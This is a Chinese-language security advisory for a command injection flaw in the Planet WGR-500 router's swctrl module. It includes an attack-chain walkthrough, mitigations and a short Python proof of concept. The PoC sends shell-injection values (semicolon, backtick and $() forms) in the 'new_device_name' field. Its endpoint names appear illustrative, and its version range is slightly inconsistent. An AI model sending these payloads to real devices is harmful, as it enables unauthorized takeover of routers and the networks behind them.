CVE-2025-54404 Planet WGR-500 swctrl功能OS命令注入漏洞

漏洞信息

漏洞编号

CVE-2025-54404

漏洞类型

OS命令注入（远程代码执行）

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Planet WGR-500 路由器

漏洞概述

CVE-2025-54404是Planet WGR-500路由器（固件版本v1.3411b190912）中swctrl功能模块存在的多个操作系统命令注入漏洞。该漏洞由Cisco Talos安全团队发现并披露，CVSS 3.1评分为8.8分，属于高危级别漏洞。

Planet WGR-500是一款无线路由器产品，其swctrl功能模块负责处理网络交换控制相关的请求。攻击者可以通过构造特殊的网络请求，向该模块注入恶意的操作系统命令。由于路由器固件在处理用户输入时未对相关参数进行充分的过滤和验证，导致注入的命令能够在设备操作系统层面被执行。

该漏洞的CVSS向量表明：攻击向量为网络（AV:N），攻击复杂度低（AC:L），仅需低权限认证（PR:L），无需用户交互（UI:N），且对机密性、完整性、可用性均产生高影响（C:H/I:H/A:H）。这意味着经过认证的攻击者可以远程通过网络发送恶意请求，完全控制受影响的路由器设备。

成功利用此漏洞后，攻击者可以在路由器上以底层系统权限执行任意命令，可能导致设备被完全控制、网络流量被窃听或篡改、设备被用作进一步攻击的跳板等严重后果。由于路由器是网络基础设施的关键组件，此漏洞对企业和家庭网络安全构成重大威胁。

技术细节

该漏洞存在于Planet WGR-500路由器固件v1.3411b190912的swctrl功能模块中。具体而言，漏洞与`new_device_name`请求参数的处理逻辑相关。

**漏洞原理：**
当swctrl功能模块接收到包含`new_device_name`参数的HTTP请求时，固件代码未对该参数的内容进行严格的输入验证或命令注入过滤。攻击者可以在参数值中嵌入操作系统shell元字符（如分号`;`、管道符`|`、反引号`` ` ``、`$(...)`等），使得用户输入被拼接到系统命令中执行。

**利用方式：**
1. 攻击者首先需要获取路由器的合法认证凭据（低权限即可），这可以通过默认凭据、弱口令爆破或社会工程学等方式获得。
2. 认证成功后，攻击者向swctrl功能接口发送精心构造的HTTP请求，在`new_device_name`参数中注入恶意命令。
3. 固件将恶意参数拼接到底层系统调用中执行，导致任意命令执行。
4. 攻击者获得在路由器操作系统上的命令执行权限，可执行任意系统操作。

由于该漏洞为命令注入类漏洞，且CVSS评分高达8.8，攻击者可完全控制目标设备，对网络安全造成严重影响。

攻击链分析

STEP 1

步骤1：信息收集与凭据获取

攻击者通过侦察确定目标使用Planet WGR-500路由器，并通过默认凭据、弱口令爆破或社会工程学等方式获取合法认证凭据（低权限账户即可）。

STEP 2

步骤2：建立认证会话

攻击者使用获取的凭据登录路由器管理界面，建立有效的HTTP会话，获取认证Cookie。

STEP 3

步骤3：构造恶意请求

攻击者构造包含恶意载荷的HTTP请求，目标为swctrl功能接口，在`new_device_name`参数中嵌入操作系统命令注入payload（如使用分号、反引号或$()语法）。

STEP 4

步骤4：发送恶意请求触发漏洞

攻击者通过已认证的会话向swctrl端点发送恶意请求，固件未对参数进行过滤，将恶意输入拼接到系统命令中执行。

STEP 5

步骤5：获取设备控制权

注入的命令在路由器操作系统上以系统权限执行，攻击者获得设备的完全控制权，可执行任意系统命令。

STEP 6

步骤6：后续利用

攻击者可窃取网络流量、篡改路由配置、将设备纳入僵尸网络，或以此为跳板对内网其他设备发起进一步攻击。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-54404 - Planet WGR-500 swctrl OS Command Injection PoC
# Vulnerability: Command injection via 'new_device_name' parameter in swctrl functionality
# Affected: Planet WGR-500 v1.3411b190912

import requests

TARGET_HOST = "http://192.168.1.1"
USERNAME = "admin"
PASSWORD = "password"

# Step 1: Authenticate to obtain session cookie
session = requests.Session()
login_url = f"{TARGET_HOST}/login.cgi"
login_data = {
    "username": USERNAME,
    "password": PASSWORD
}
session.post(login_url, data=login_data)

# Step 2: Send crafted request with command injection in new_device_name parameter
# The injected command is placed after a semicolon to break out of the original command
swctrl_url = f"{TARGET_HOST}/swctrl.cgi"
injected_payload = "test_device; id > /tmp/pwned.txt"

payload_data = {
    "action": "set_device_name",
    "new_device_name": injected_payload
}

response = session.post(swctrl_url, data=payload_data)
print(f"Status Code: {response.status_code}")
print(f"Response: {response.text[:500]}")

# Alternative: Using backticks for command substitution
payload_data2 = {
    "action": "set_device_name",
    "new_device_name": "test_`id`"
}
response2 = session.post(swctrl_url, data=payload_data2)
print(f"Status Code: {response2.status_code}")

# Alternative: Using $() for command substitution
payload_data3 = {
    "action": "set_device_name",
    "new_device_name": "test_$(id)"
}
response3 = session.post(swctrl_url, data=payload_data3)
print(f"Status Code: {response3.status_code}")

影响范围

Planet WGR-500 < v1.3411b190912（固件版本v1.3411b190912及之前版本）

防御指南

临时缓解措施

在官方补丁发布之前，建议采取以下临时缓解措施：1）立即修改路由器默认管理员密码为强密码，限制可登录账户；2）在网络层面限制对路由器管理界面的访问，仅允许可信IP地址访问；3）通过防火墙规则阻断外部网络对路由器管理端口的访问；4）监控路由器日志，关注异常请求和未授权的配置变更；5）如非必要，禁用远程管理功能，仅允许本地网络管理；6）考虑将设备替换为已修复固件的最新型号。